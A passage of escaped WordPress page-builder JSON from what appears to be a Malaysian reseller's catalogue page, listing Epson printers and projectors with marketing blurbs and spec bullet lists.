large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/h4><p><br \\/><br \\/>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"47\",\"right\":\"47\",\"bottom\":\"47\",\"left\":\"47\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER 